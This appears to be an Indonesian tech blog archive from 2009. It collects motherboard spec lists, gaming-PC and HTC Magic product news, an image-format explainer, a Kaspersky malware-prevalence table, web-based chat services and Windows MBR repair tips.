Senin, 10 Agustus 2009

5 Besar Motherboard AMD

1.DFI LANPARTY DK 790FX-M2RS AM2+/AM2 AMD 790FX ATX AMD Motherboard
- CPU Type: Phenom / Athlon 64 X2 / Athlon 64 FX / Athlon 64
- Dual Channel Supported: Yes
- FSB: 2600MHz Hyper Transport (5200 MT/s)
- Maximum Memory Supported: 8GB
- Memory Standard: DDR2 800
- Number of Memory Slots: 4%uFFFD240pin
- PATA: 1 x ATA100 2 Dev. Max
- PCI Express 2.0 x16: 3 PCI Express 2.0 x16 slots - 2-way or 4-way CrossFire at x16/x16/NC bandwidth - 3-way CrossFire at x16/x16/x4 bandwidth - 2-way CrossFire + Physics at x16/x16 bandwidth
# Model #: 790FX-M2RS

2.MSI K9NGM4-F V.2 AM2+/AM2 NVIDIA GeForce 7025 Micro ATX AMD Motherboard
- CPU Type: Phenom / Athlon 64 X2 / Sempron
- Dual Channel Supported: Yes
- FSB: 1000MHz Hyper Transport (2000 MT/s)
- Maximum Memory Supported: 4GB
- Memory Standard: DDR2 800
- Number of Memory Slots: 2%uFFFD240pin
- PATA: 1 x ATA100 2 Dev. Max
- PCI Express x1: 1
- Model #: K9NGM4-F V.2

3. ASUS M3A-H/HDMI AM2+/AM2 AMD 780G HDMI ATX AMD Motherboard
- CPU Type: Phenom FX / Phenom / Athlon 64 FX / Athlon 64 X2
- FSB: 2600MHz Hyper Transport (5200 MT/s)
- South Bridge: AMD SB700
- Number of Memory Slots: 4%uFFFD240pin
- Memory Standard: DDR2 1066
- Maximum Memory Supported: 8GB
- Dual Channel Supported: Yes
- PCI Express 2.0 x16: 1
- Model #: M3A-H/HDMI
- Item #: N82E16813131289

4. ASUS M2N-SLI Deluxe AM2 NVIDIA nForce 570 SLI MCP ATX AMD Motherboard
- CPU Type: Athlon 64 X2 / Athlon 64 FX / Athlon 64
- Dual Channel Supported: Yes
- FSB: 1000MHz Hyper Transport (2000 MT/s)
- Maximum Memory Supported: 8GB
- Memory Standard: DDR2 800
- Number of Memory Slots: 4%uFFFD240pin
- PATA: 1 x ATA100 2 Dev. Max
- PCI Express x1: 2
- Model #: M2N-SLI Deluxe

5.ASUS M2N32-SLI Deluxe Wireless Edition AM2 NVIDIA nForce 590 SLI MCP ATX AMD Motherboard
- CPU Type: Athlon 64 X2 / Athlon 64 FX / Athlon 64
- FSB: 1000MHz Hyper Transport (2000 MT/s)
- Number of Memory Slots: 4%uFFFD240pin
- Memory Standard: DDR2 800
- Maximum Memory Supported: 8GB
- Dual Channel Supported: Yes
- PCI Express x16: 2
- PCI Express x4: 1
- Model #: M2N32-SLI DLX WIFI

5 Besar Motherboard Intel

1. ABIT IP35 Pro LGA 775 Intel P35 ATX Intel Motherboard
- CPU Type: Quad-core / Core 2 Extreme / Core 2 Duo / Pentium
- Dual Channel Supported: Yes
- FSB: 1333/1066MHz
- Maximum Memory Supported: 8GB
- Memory Standard: DDR2 800
- Number of Memory Slots: 4×240pin
- PCI Express x1: 1
- PCI Express x16: 1 x PCI-E X16, 1 x PCI-E X16 (x4 bandwidth)
- Model #: IP35 Pro
- Item #: N82E16813127030

2. Intel BOXD975XBX2KR LGA 775 Intel 975X ATX Intel Motherboard
- CPU Type: Quad-core / Core 2 Extreme / Core 2 Duo / Pentium
- Dual Channel Supported: Yes
- FSB: 1066/800MHz
- Maximum Memory Supported: 8GB
- Memory Standard: DDR2 800
- Number of Memory Slots: 4%uFFFD240pin
- PCI Express x16: 3 (1 electrical x16 or x8, 1 electrical x8, 1 electrical x4)
- PCI Slots: 2
- Model #: BOXD975XBX2KR
- Item #: N82E16813121059

3. XFX MB-N780-ISH9 LGA 775 NVIDIA nForce 780i SLI Intel Motherboard
- CPU Type: Quad-core / Core 2 Extreme / Core 2 Duo / Pentium
- Dual Channel Supported: Yes
- FSB: 1333/1066MHz
- Maximum Memory Supported: 8GB
- Memory Standard: DDR2 800 (up to DDR2 1200 with EPP 1.0)
- Number of Memory Slots: 4×240pin
- PCI Express 2.0 x16: 2
- PCI Express x1: 1
- Model #: MB-N780-ISH9
- Item #: N82E16813141005

4. GIGABYTE GA-G31M-S2L LGA 775 Intel G31 Micro ATX Intel Motherboard
- CPU Type: Quad-core / Core 2 Extreme / Core 2 Duo / Pentium
- Dual Channel Supported: Yes
- FSB: 1333/1066MHz
- Maximum Memory Supported: 4GB
- Memory Standard: DDR2 800
- Number of Memory Slots: 2%uFFFD240pin
- PCI Express x1: 1
- PCI Express x16: 1
- Model #: GA-G31M-S2L

5. GIGABYTE GA-EP35C-DS3R LGA 775 Intel P35 ATX Dynamic Energy Saver Ultra Durable II Intel Motherboard
- CPU Type: Quad-core / Core 2 Extreme / Core 2 Duo / Pentium
- FSB: 1600 (O.C.)/1333/1066MHz
- South Bridge: Intel ICH9R
- Number of Memory Slots: 6%uFFFD240pin
- Memory Standard: DDR3 1333 / DDR2 1066
- Maximum Memory Supported: DDR3 up to 4 GB DDR2 up to 8 GB
- Dual Channel Supported: Yes
- PCI Express x16: 1
- Model #: GA-EP35C-DS3R

Selasa, 04 Agustus 2009

Predator Datang Lagi!

Bagi Anda para pecinta game tentu sudah tidak asing dengan desktop PC seri Aspire G buatan Acer. Desktop PC ini juga dikenal dengan nama “Predator”. Belum lama ini, Acer kembali memperkenalkan seri baru dari seri Predator, yang diberi nomor seri ASG7710-A41.

http://www.chip.co.id/images/stories/chip/news/082009/aspire_g7710.jpg

Dengan semakin meningkatnya requirement minimum yang dibutuhkan oleh sebuah game, maka semakin tinggi pula kebutuhan user akan sebuah komputer yang mampu menjalankan game tersebut. Tentu untuk merakit sebuah komputer dengan kemampuan yang tinggi tidak sulit (apalagi kalau Anda didukung dengan simpanan uang yang banyak). Namun, seringkali “ramuan” yang dipadukan tidak tepat, hingga hasil racikan yang diperoleh tidak maksimal. Oleh karena itu, tidak ada salahnya mencoba sebuah desktop yang sudah dirancang khusus (dijual dalam satu bundle) untuk menjalankan suatu fungsi tertentu, seperti apa yang Acer lakukan kali ini.

Seri terbaru ini ditenagai oleh Core i7-950 3.06GHZ. Desktop ini juga didukung dengan memori yang cukup besar, yaitu sebesar 6GB DDR3. Kalau Anda masih merasa kurang puas dengan memori sebesar itu, Anda masih bisa menambah memori desktop tersebut hingga 12GB. Seri ini juga didukung oleh Intel X58 Express Chipset. Kebutuhkan hard disk yang sudah semakin besar cukup disadari oleh Acer. Mereka menggunakan 1 TB SATA HDD dengan kecepatan 7200 sebagai media penyimpanan data.

Karena desktop PC ini memang ditujukkan untuk keperluan gaming, maka tidak heran kalau desktop ini dilengkapi oleh dua buah kartu grafis. ASG7710 dilengkapi oleh dua buah Nvidia GeForce GTS 230 (1GB VRAM). Sebagai pelengkap, Acer melengkapi desktop PC ini dengan sebuah Blu-ray disc drive, 11 buah port USB 2.0, 2 port eSATA, sebuah multi-card reader, 4 port DVI-D, dan 2 buah Gigabit Ethernet. Acer memilih Windows Vista Home Premium (64 bit) sebagai OS desktop ini. Merasa komponen tersebut belum cukup? Acer menambahkan keyboard G15 dan mouse G9 sebagai alat kendali Anda.

Bagi Anda yang berniat untuk membeli desktop ini, Anda harus sedikit bersabar. Desktop ini baru akan keluar beberapa minggu lagi di Jepang. Desktop ini dihargai dengan harga sekitar 259.800 Yen di Jepang atau 1950 Euro. Bagaimana dengan Indonesia? Tunggu saja.

Cek Online YM

Kamis, 30 Juli 2009

Perbedaan format file antara JPG/JPEG, GIF dan PNG

JPG/JPEG (Joint Photographic Experts Group)
Tipe file JPG sangat sering digunakan untuk web atau blog. File JPG menggunakan teknik kompresi yang menyebabkan kualitas gambar turun (lossy compression). Setiap kali menyimpan ke tipe JPG dari tipe lain, ukuran gambar biasanya mengecil, tetapi kualitasnya turun dan tidak dapat dikembalikan lagi. Ukuran file BMP dapat turun menjadi sepersepuluhnya setelah dikonversi menjadi JPG. Meskipun dengan penurunan kualitas gambar, pada gambar-gambar tertentu (misalnya pemandangan), penurunan kualitas gambar hampir tidak terlihat mata.

File JPG cocok digunakan untuk:
gambar yang memiliki banyak warna, misalnya foto wajah dan pemandangan.
gambar yang memiliki gradien, misalnya perubahan warna yang perlahan-lahan dari merah ke biru.
File JPG tidak cocok digunakan untuk:
gambar yang hanya memiliki warna sedikit seperti kartun atau komik.
gambar yang memerlukan ketegasan garis seperti logo.

GIF (Graphics Interchange Format)
Tipe file GIF memungkinkan penambahan warna transparan dan dapat digunakan untuk membuat animasi sederhana, tetapi saat ini standar GIF hanya maksimal 256 warna saja. File ini menggunakan kompresi yang tidak menghilangkan data (lossles compression) tetapi penurunan jumlah warna menjadi 256 sering membuat gambar yang kaya warna seperti pemandangan menjadi tidak realistis. Pada program MS Paint, tidak ada fasilitas penyesuaian warna yang digunakan (color table) sehingga menyimpan file GIF di MS Paint seringkali menghasilkan gambar yang terlihat rusak atau berubah warna. Pada program pengolah gambar yang lebih baik, seperti Adobe Photoshop, color table bisa diatur otomatis atau manual sehingga gambar tidak berubah warna atau rusak.

File GIF cocok digunakan untuk:
gambar dengan jumlah warna sedikit (dibawah 256).
gambar yang memerlukan perbedaan warna yang tegas seperti logo tanpa gradien.
gambar animasi sederhana seperti banner-banner iklan, header, dan sebagainya.
print shoot (hasil dari print screen) dari program-program simple dengan jumlah warna sedikit.
File GIF tidak cocok digunakan untuk:
gambar yang memiliki banyak warna seperti pemandangan.
gambar yang didalamnya terdapat warna gradien atau semburat.

PNG (Portable Network Graphics)
Tipe file PNG merupakan solusi kompresi yang powerfull dengan warna yang lebih banyak (24 bit RGB + alpha). Berbeda dengan JPG yang menggunakan teknik kompresi yang menghilangkan data, file PNG menggunakan kompresi yang tidak menghilangkan data (lossles compression). Kelebihan file PNG adalah adanya warna transparan dan alpha. Warna alpha memungkinkan sebuah gambar transparan, tetapi gambar tersebut masih dapat dilihat mata seperti samar-samar atau bening. File PNG dapat diatur jumlah warnanya 64 bit (true color + alpha) sampai indexed color 1 bit. Dengan jumlah warna yang sama, kompresi file PNG lebih baik daripada GIF, tetapi memiliki ukuran file yang lebih besar daripada JPG. Kekurangan tipe PNG adalah belum populer sehingga sebagian browser tidak mendukungnya.

File PNG cocok digunakan untuk:
gambar yang memiliki warna banyak.
gambar yang mau diedit ulang tanpa menurunkan kualitas.
File PNG tidak cocok digunakan untuk:
gambar yang jika dikompress dengan JPG hampir-hampir tidak terlihat penurunan kualitasnya.

Rabu, 29 Juli 2009

Kido Tetap Berbahaya (KASPERSKY)

Kido atau biasa dikenal dengan Conficker, secara perlahan-lahan mulai tidak terdengar lagi. Namun, intensitas serangan Kido ternyata masih menjadi yang tertinggi berdasarkan daftar nama-nama Malware (Top 100) yang beredar di Indonesia menurut laporan dari Kaspersky Lab untuk periode 16 Juli 2009 – 23 Juli 2009.

Serangan Kido masih memimpin jauh di daftar ini. Terdapat perbedaan jumlah serangan hingga 30% antara pemimpin daftar ini (Kido) dengan posisi no 2 (Invader).

CHIP menyarankan untuk terus melakukan update sistem keamanan komputer milik Anda. Hal tersebut merupakan salah satu upaya mempersempit ruang gerak Malware.
Untuk menyeleksinya menjadi Top 100, setiap deteksi malware berdasarkan negara membutuhkan serangan kepada koleksi server Kaspersky yang berjumlah
lebih dari 7.000.

Berikut daftar nama lengkap, Malware (Top 100) yang beredar di Indonesia menurut laporan dari Kaspersky Lab untuk periode 16 Juli 2009 – 23 Juli 2009.
Malware name Hits
Net-Worm.Win32.Kido.ih 44.2262%
HEUR:Trojan.Win32.Invader 13.75%
HEUR:Trojan.Win32.Generic 3.5714%
Heur.Win32.Trojan.Generic 3.4524%
Trojan-Downloader.Win32.FraudLoad.ezj 2.619%
Trojan-Dropper.Win32.Small.axv 2.1429%
Trojan.Win32.FraudPack.pow 1.7262%
Trojan.Win32.Agent.cqig 1.6667%
Trojan.Win32.FraudPack.pmx 1.4881%
Trojan-Downloader.Win32.FraudLoad.ezp 1.3095%
Trojan.Win32.Buzus.bnvw 1.25%
Net-Worm.Win32.Kido.eo 1.1905%
Trojan.Win32.Agent.cqcn 1.0714%
Trojan.Win32.Buzus.bohj 0.8929%
Trojan-Mailfinder.Win32.Agent.ip 0.8929%
Trojan-Dropper.Win32.Agent.zje 0.8333%
Trojan-Downloader.Win32.FraudLoad.wfqy 0.8333%
Trojan-Downloader.Win32.Agent.ansh 0.7738%
Trojan-Downloader.Win32.Agent.wxq 0.7143%
Trojan.Win32.Buzus.bolj 0.6548%
HEUR:Worm.Win32.Generic 0.6548%
Trojan-Mailfinder.Win32.Agent.pt 0.6548%
Trojan-Downloader.Win32.Agent.cjdc 0.5952%
Trojan.Win32.Monder.cmwt 0.5357%
Heur.Win32.Invader 0.5357%
HEUR:Trojan-Downloader.Win32.Generic 0.5357%
not-a-virus:Client-IRC.Win32.mIRC.g 0.4762%
Net-Worm.Win32.Kido.dam.y 0.4762%
Trojan-Downloader.Win32.Agent.ciyv 0.4167%
Trojan-Downloader.Win32.FraudLoad.whpb 0.4167%
Trojan.Win32.VB.srt 0.3571%
Trojan.Win32.Stuh.rgk 0.2976%
Trojan-Dropper.Win32.Agent.avxt 0.2976%
Trojan-Downloader.Win32.Banload.agbh 0.2976%
not-a-virus:AdWare.Win32.Agent.lmz 0.2976%
Trojan-GameThief.Win32.OnLineGames.bmml 0.2976%
Trojan.Win32.Vapsup.ucg 0.2381%
Trojan-Proxy.Win32.Agent.boe 0.2381%
not-a-virus:AdWare.Win32.Shopper.v 0.1786%
Trojan-Downloader.Win32.FraudLoad.ezs 0.1786%
Trojan-PSW.Win32.Staem.an 0.1786%
Backdoor.Win32.Zdoogu.eu 0.1786%
Trojan.Win32.Agent2.cgbw 0.1786%
Suspicious.Win32.Packer 0.1786%
Trojan.Win32.Agent2.hxw 0.1786%
Backdoor.Win32.SdBot.dzk 0.1786%
Virus.Win32.Alman.b 0.1786%
Trojan.Win32.Agent.cqub 0.1786%
Packed.Win32.Black.a 0.1786%
P2P-Worm.Win32.Palevo.hpy 0.119%
Packed.Win32.Black.d 0.119%
Virus.Win32.Sality.aa 0.119%
Hoax.Win32.BadJoke.VB.cf 0.119%
Trojan-Downloader.Win32.Agent.cijq 0.119%
Trojan.Win32.Tdss.ajiq 0.119%
Email-Worm.Win32.Joleee.bwr 0.119%
MultiPacked.Multi.Generic 0.119%
Trojan.Win32.Buzus.bogq 0.119%
Backdoor.Win32.Poison.accz 0.119%
Backdoor.Win32.IRCBot.dsh 0.119%
Trojan.Win32.FlyStudio.ll 0.119%
not-a-virus:AdWare.Win32.Shopper.l 0.119%
not-a-virus:AdWare.Win32.Craagle.b 0.119%
Email-Worm.Win32.generic 0.0595%
Trojan.Win32.FraudPack.ppj 0.0595%
Trojan-Downloader.Win32.FraudLoad.whlr 0.0595%
Trojan.Win32.Qhost.lsd 0.0595%
Trojan.Win32.Agent.cqpr 0.0595%
Trojan-Dropper.Win32.Agent.aven 0.0595%
Trojan-GameThief.Win32.Magania.biht 0.0595%
Trojan-Downloader.Win32.Agent.apjc 0.0595%
Trojan.Win32.Buzus.aixn 0.0595%
Trojan.Win32.Agent.cccr 0.0595%
Backdoor.Win32.Bifrose.agir 0.0595%
not-a-virus:AdWare.Win32.SuperJuan.vzr 0.0595%
Backdoor.Win32.Bifrose.aknz 0.0595%
Exploit.Win32.DCom.ad 0.0595%
Trojan-Dropper.Win32.Wlord.fb 0.0595%
Backdoor.Win32.Poison.aec 0.0595%
Trojan-Dropper.Win32.Agent.cpd 0.0595%
Trojan.Win32.Delf.bsg 0.0595%
Backdoor.Win32.VB.jjm 0.0595%
Multi.Win32.Packed 0.0595%
not-a-virus:PSWTool.Win32.Cain.284 0.0595%
Trojan.Win32.Agent.abud 0.0595%
not-a-virus:AdWare.Win32.Mostofate.ah 0.0595%
Trojan.Win32.Monder.gen 0.0595%
Virus.Win32.Sality.z 0.0595%
HackTool.Win32.Injecter.l 0.0595%
not-a-virus:Client-IRC.Win32.mIRC.621 0.0595%
Trojan-Downloader.Win32.Agent.cisj 0.0595%
Trojan-PSW.Win32.Agent.nko 0.0595%
Net-Worm.Win32.Kido.cy 0.0595%
Trojan-Dropper.Win32.VB.lhn 0.0595%
Backdoor.Win32.Bifrose.avwo 0.0595%
Trojan.Win32.KillWin.pi 0.0595%
HEUR:Backdoor.Win32.Generic 0.0595%
Trojan-Dropper.Win32.Agent.awov 0.0595%
Virus.Win32.VB.ki 0.0595%
Trojan.Win32.Agent.rzw 0.0595%

HTC dan Telkomsel Memperkenalkan HTC Magic™

Telepon Selular Pertama di Indonesia dengan sistem operasi Android

press_magic.jpgJakarta – 11 Juni 2009 — Operator selular terkemuka di Indonesia, Telkomsel dan HTC Corporation, pemimpin global dalam desain dan inovasi telepon bergerak, hari ini memperkenalkan HTC Magic yang merupakan telepon selular pertama dengan sistem operasi Android ke pasar Indonesia. Ponsel pintar yang berbentuk tablet, dengan desain yang rapi serta kompak yang belum pernah ada sebelumnya, menampilkan platform Android yang membuat HTC Magic mampu memberikan pengalaman internet yang superior.

Pengembangan lebih lanjut dengan sinkronisasi Outlook, Smart Dial dan keyboard yang terdapat pada layar dengan kemampuan untuk memprediksi teks, membuat HTC Magic merupakan perangkat sesungguhnya untuk hiburan dan komunikasi.

Memberikan Keleluasaan Fleksibilitas Sesuai Selera Anda
HTC Magic memiliki layar sentuh HVGA 3.2 inci” dan menampilkan trackball yang mempermudah akses, kamera 3.2 mega-piksel dan GPS. Semuanya itu memberikan pengalaman yang sesungguhnya dalam berselancar didunia maya, dimana para pengguna dapat lebih mengembangkan serta mempersonalisasikan ponsel mereka sesuai dengan gaya hidup mereka.

“HTC Magic mewujudkan desain kompak serta kecanggihan yang membuat HTC dikenal luas, dengan pengalaman internet yang intuitif yang memang khusus dirancang dalam platform Android,” kata Peter Chou, Presiden Direktur dan CEO, HTC Corporation.

VP Channel Management Telkomsel Gideon Edi Purnomo mengatakan, “Pada dasarnya Telkomsel terus berupaya menghadirkan beragam inovasi produk dan layanan sesuai dengan kebutuhan pelanggan. Kehadiran HTC Magic tentunya akan melengkapi ragam pilihan paket bundling smartphone yang ditawarkan Telkomsel. Hal ini sejalan dengan visi Telkomsel sebagai the best mobile lifestyle operator in region.”

Dukungan Superior dan Pengalaman Internet Bergerak yang Tak terkalahkan
HTC Magic menampilkan trackball dengan fungsi zoom in/out. Ponsel ini juga dapat menyesuaikan gambar yang terdapat pada layar, dan rotasi otomatis untuk kemudahan dalam bernavigasi dan berselancar di internet.

Jauh Lebih Baik
HTC Magic saat ini dilengkapi dengan fitur-fitur dari HTC yang telah dikembangkan seperti Smart Dialer dan keyboard multi fungsi yang terdapat di layar ponsel. Smart Dialer memudahkan Anda kapanpun ingin melakukan panggilan, hanya dengan menekan tombol nomor telepon yang ingin dituju ataupun dengan menekan huruf pertama dari nama mereka. Sementara keyboard multifungsi membuat Anda untuk dapat memilih cara favorit Anda dalam mengetik pesan dan predictive text completion pada keyboard yang membantu mengetik lebih cepat dari pikiran Anda sendiri.

Memilih Koneksi Anda
Bawalah kotak surat Anda kemanapun Anda pergi. HTC Magic membuat Anda terbebas dari rasa khawatir dengan easy account set up, multiple mailbox support dan Microsoft Exchange server synchronization untuk surat elektronik, kalendar dan kontak. Secara sederhana, dengan HTC Magic, Anda akan tetap terkoneksi dengan surat eletronik pribadi ataupun kantor dimanapun dan kapanpun.

Harga & Ketersediaan:
HTC Magic sudah tersedia di semua reseller-reseller resmi dengan kisaran harga ritel Rp. 6,500,000. Paket ritel standar HTC Magic dilengkapi dengan kartu memori 2GB microSD™.
*Harga tergantung dari kebijakan masing-masing operator.

Kamis, 09 Juli 2009

WiFi Gratis Bagi Warga Kota Venice

Pernah membayangkan kebebasan mengakses internet nirkabel di mana saja? Dewan Kota Venice baru-baru ini meresmikan layanan internet broadband Wi-Fi yang jangkauannya mencakup seluruh penjuru kota.

Dengan fasilitas ini, seluruh penduduk kota, pelajar, dan pebisnis bisa terhubung dengan jaringan internet supercepat tanpa harus merogoh kocek sepeser pun. Sementara, bagi wisatawan, dikenakan biaya 5 euro per hari.

Layanan internet kota Venice diklaim sebagai jaringan Wi-Fi terluas yang pernah diterapkan di benua Eropa. Sepanjang 10.000 kilometer serat optik, ratusan hot spot, dan sambungan ke semua perpustakaan umum, hanya sekelumit dari spesifikasi teknis yang dimiliki. Salah satu kota paling tua ini menyusul kota-kota benua biru lain dalam memberikan akses Wi-Fi gratis kepada warganya, seperti London, Madrid, Berlin, dan Roma.

"Dewan kota mendanai proyek ini sebesar 10 juta euro. Untuk mengembangkannya, kami akan mencari dukungan pemodal swasta," tutur Michele Vianello (deputi walikota Venice) ketika diwawancarai Reuters.

Koneksi secepat 20 - 100 megabytes akan dimanfaatkan utamanya sebagai sarana e-commerce dan televisi kabel, membebaskan kota dari antena yang mengganggu pemandangan. Selain itu, Vianello juga berencana mempromosikan warisan budaya Venice melalui web.

Untuk menandai peluncuran layanan ini, diselenggarakan game petualangan interaktif Treasure Hunting. Dalam permainan tersebut, para peserta harus mencari sebuah "tongkat sihir misterius" yang tersembunyi di salah satu sudut kota. Untuk menemukannya, mereka memperoleh pedoman arah dan petunjuk rahasia yang dikirimkan secara elektronis lewat ponsel dan laptop.

Dengan adanya jaringan Wi-Fi, pengunjung bisa naik gondola menyusuri keindahan kanal-kanal dan bangunan bersejarah kota Venice sembari membawa peranti mobile. Bahkan mungkin jasa pemandu wisata tidak diperlukan lagi karena semua informasi bisa didapat secara online.

kapan yah Indonesia bisa seperti Venice......????

Chatting Tanpa Takut Diblokir

Apa sih kelebihan instant messaging jenis ini dibandingkan dengan instant messaging dalam bentuk aplikasi mandiri? Bayangkan jika ternyata komputer yang Anda gunakan untuk berinternet tak tersedia aplikasi instant messaging satu pun.

Mengunduh file penginstalnya, lalu melakukan penginstalan, tentu membutuhkan waktu agak lama. Bisa jadi rekan ngobrol yang diinginkan sudah terlanjur sign out karena tak sabar menunggu.

Layanan kirim pesan praktis ini juga menjadi solusi jika jalur instant messaging Anda diblokir oleh administrator jaringan di tempat Anda bekerja. Kecuali jika semua alamat web layanan web-based chatting tersebut turut dihadang.

Karena berbasis web, chating dengan IM berbasis web tak perlu mensetting alamat IP (internet protocol). Seperti melakukan browsing, Anda cukup buka internet browser, masuk ke alamat layanan, login dengan account username dan password yang biasa Anda pakai, lalu langsung ngobrol dengan cepat.

Pilihan Beragam

Hampir semua layanan instant messaging mulai dari MSN, Yahoo! Messenger, sampai Google Talk pun memiliki layanan messaging versi web-based. Beberapa memang masih berstatus Beta, tapi sudah lumayan lancar untuk dimanfaatkan.

Jika Anda pengguna Yahoo! Messenger, manfaatkan versi web layanan chatting tersebut di alamat. webmessenger.yahoo.com Ini adalah solusi praktis jika aplikasi chatting tersebut sedang bermasalah di PC Anda.

Caranya pakainya tak sulit. Jika Anda sudah memiliki account Y!M, tinggal masukkan saja username dan password di kotak isian tersebut.

Fasilitas standar yang ada di program Y!M ada di sini, hanya saja tak semua opsi setting dan plugin tersedia. Aplikasi web berbasis flash ini tetap menyertakan pilihan emoticon, pilihan huruf, hingga fasilitas view untuk menampilkan teman yang sedang offline dan online.

Sebenarnya fasilitas ini sudah bisa Anda rasakan langsung di e-mail account Yahoo! Anda. Terutama jika Anda sudah memakai interface baru Yahoo! Mail.

Anda pengguna MSN Messenger dan Google Talk juga bisa mengakses versi web masing-masing layanan di webmessenger.msn.com dan www.google.com/talk/#. Fiturnya serupa dengan Yahoo! Messenger, tersedia hanya yang standar, namun ini pun sudah memadai.

Satu Situs, Beragam IM

Selain layanan resmi dari masing-masing instant messaging, Anda bisa menemukan layanan dari pihak ketiga. Biasanya layanan pihak ketiga ini menyediakan fasilitas akses ke banyak layanan. Salah satunya dan yang terpopular adalah Meebo.

Dengan Meebo (yang beralamat di www.meebo.com), Anda bisa mengakses jalur chatting beraneka layanan. Dalam satu website, Anda bisa menggunakan beberapa account chatting sekaligus, seperti Yahoo! Messenger, AIM, Google Talk, dan MSN Messenger. Selain itu, Meebo sendiri menyediakan kanal tersendiri untuk chatting antar sesama pengguna Meebo.

Di sini, Anda bisa mengaktifkan beberapa account sekaligus. Dan semuanya bisa dipantau dari satu jendela di dalam web browser. Memang, yang aktif hanya fasilitas untuk kirim-terima pesan teks saja, belum tersedia video call atau audio call. Layanan ini sangat efektif jika Anda memiliki banyak messenger account dan hendak membukanya secara bersamaan, tanpa harus berpindah jendela aplikasi.

Layanan seperti Meebo ini semakin banyak. Akses kanal messenger yang ditawarkan pun lebih banyak. Salah satunya adalah eBuddy. Layanan berlamat www.ebuddy.com ini memiliki akses ngobrol ke MSN Messenger, Yahoo Messenger, AIM, GTalk, hingga kanal messaging milik eBuddy sendiri. Bahkan, layanan private message di My Space pun bisa diaksesnya. Tak hanya itu, Anda bisa menggunakannya di ponsel.

Mau yang lebih banyak kanalnya? Coba Kool IM di www.koolim.com. Di sini, Anda bisa mengakses AIM, MSN, Yahoo!, Google Talk, ICQ, Gadu-Gadu, dan X-Fire. ICQ adalah layanan chatting yang sudah lama beken di jagat maya. Komplet banget ya. Semua bisa diakses hanya dengan satu jendela browser saja.

Layanan lainnya masih banyak. Beberapa alamat bisa Anda lihat di boks. Dari kesemua layanan tersebut, seluruhnya menawarkan efektifitas dalam berkirim dan terima pesan, tanpa harus menginstal program. Pun ada yang khusus untuk jalur messaging via peranti mobile.

Ini artinya Anda tak perlu repot lagi kesulitan dalam mengakses jalur komunikasi karena banyak pilihan alternatifnya. Tak ada lagi kata sebal meski Y!M diblokir. Toh, tak ada yang salah dengan chatting, karena ini bisa jadi tool komunikasi kerja yang paling murah. Ngobrol sama teman di sela kerja? Boleh saja, asal ingat waktu. Semua bisa diatur.

Mengakses Y!M Beraneka Jalur

Taruh kata, aplikasi Yahoo! Messenger Anda sedang ngadat. Sudah dicek setelan koneksinya, tetap saja pesan tidak dapat terkirim. Bagaimana solusinya agar komunikasi tetap bisa berjalan. Ikuti panduan berikut:

Cara memanfaatkan Yahoo! Web Messenger

1. Buka alamat webmessenger.yahoo.com.

2. Klik tombol [Sign In] dan masukkan username dan password Yahoo! Anda di kotak isian yang muncul.

3. Tunggu beberapa saat hingga tampilan jendela messaging muncul.

4. Kini Anda tinggal memilih teman (Friends atau Buddies) dari daftar di sisi kiri jendela browser dengan mengkliknya.

5. Ketikkan pesan di kotak isian yang berada di tengah bawah.

6. Serupa di aplikasi Y!M, Anda bisa mengubah jenis, warna, dan ukuran huruf di sini. Anda bisa menyisipkan emoticons pula.

7. Untuk menambah teman ngobrol, Anda bisa mengklik [Add]

8. lalu pilih jenis kontak teman yang diinginkan Pilihannya kontak telepon, Windows Live, dan Yahoo!.

Jika Anda ingin daftar teman yang sedang online saja,, caranya sebagai berikut :

1. klik [View]

2. [Show online contacts only].

3. Daftar pesan yang terkirim dan diterima bisa Anda akses di link [Message History].

Cara memanfaatkan E-mail Account

Anda juga bisa chatting via jendela account e-mail Anda. Caranya:

1. masuklah ke account e-mail Anda.

2. Pastikan Anda menggunakan tampilan Yahoo! Mail yang baru, serupa dengan Microsoft Outlook.

3. Untuk mengaktifkan instant messenger di Yahoo! Mail, klik tombol segitiga di samping kanan link “Offline” Link ini berada di atas halaman.

4. Dari menu yang muncul, pilih [Available].

5. Tunggu beberapa saat hingga muncul daftar teman ngobrol Anda di panel kiri halaman web.

6. Klik salah satu teman dan tunggu hingga muncul jendela tab baru berisi kotak untuk berkirim-terima pesan.

7. Selanjutnya Anda tinggal ketikkan pesan lalu tekan [Send], seperti cara biasa untuk chatting di instant messaging.

Pilihan Messenger Berbasis Web

Layanan instant messenger berbasis web bukan hanya Meebo saja. Anda memiliki banyak alternatif pilihan. Inilah pilihannya:

messidog.live.com

webmessenger.msn.com

webmessenger.yahoo.com

www.aim.com/aimexpress.adp

www.communicationtube.com

www.ebuddy.com

www.google.com/talk/#

www.iloveim.com

www.imhaha.com/webmsg/index.jsp

www.imo.im

www.imunitive.com

www.juslol.com

www.koolim.com

www.meebo.com

www.meglobe.com

www.messengerfx.com

www.mijnmessenger.nl

www.msn2go.com

www.nightcitychat.com

www.radiusim.com

Master Boot Record ???

Di dalam harddisk, ada sebuah file yang disebut MBR (Master Boot Record). File ini berada di byte pertama dan sektor pertama harddisk; pokoknya benar-benar pertama. Maklum, MBR inilah yang menjadi penanda keberadaan harddisk. Jika dianalogikan, MBR ini seperti peta yang menuntun BIOS menemukan harddisk.

Namun berbagai hal bisa menyebabkan MBR tersebut rusak, seperti terkena virus atau terformat tidak sengaja. Jika itu terjadi, sistem operasi pun kehilangan penunjuk jalan yang ditandai dengan munculnya pesan Operating System not found atau missing operating system di layar.

Solusi dari masalah ini adalah dengan mengembalikan file MBR tersebut. Cara paling umum dilakukan adalah melakukan proses recovery dari CD Windows. Caranya, booting ke CD Windows, lalu pilih Repair (dengan menekan tombol R) dan masuk ke Recovery Console. Setelah itu, ketikkan perintah fixmbr untuk mengembalikan file MBR tersebut.

Untuk Windows Vista, konsepnya sama meski prosedurnya sedikit berbeda. Pertama, booting ke DVD Windows Vista, lalu pilih Repair Your Computer. Ketika System Recovery Options muncul, pilih Command Prompt. Setelah muncul jendela Command Prompt, ketik bootrec.exe dan tekan Enter.

Jika CD Windows sudah hilang entah kemana, Anda bisa menggunakan aplikasi dari Rescue Kit 9.0 Express buatan Paragon. Ini adalah aplikasi gratisan yang memiliki fungsi beragam, termasuk mengembalikan MBR. Aplikasi ini bersifat bootable, artinya bisa di-burn ke CD dan menjadi sumber proses booting. Ketika sistem menunjukkan gejala kehilangan MBR, yang harus Anda lakukan adalah booting ke CD berisi Rescue Kit ini. Setelah itu, pilih menu Boot Corrector, ikuti prosedur yang telah ditentukan, dan kasus kehilangan MBR seharusnya telah teratasi.

Google Operating System ???

Sejarah Google
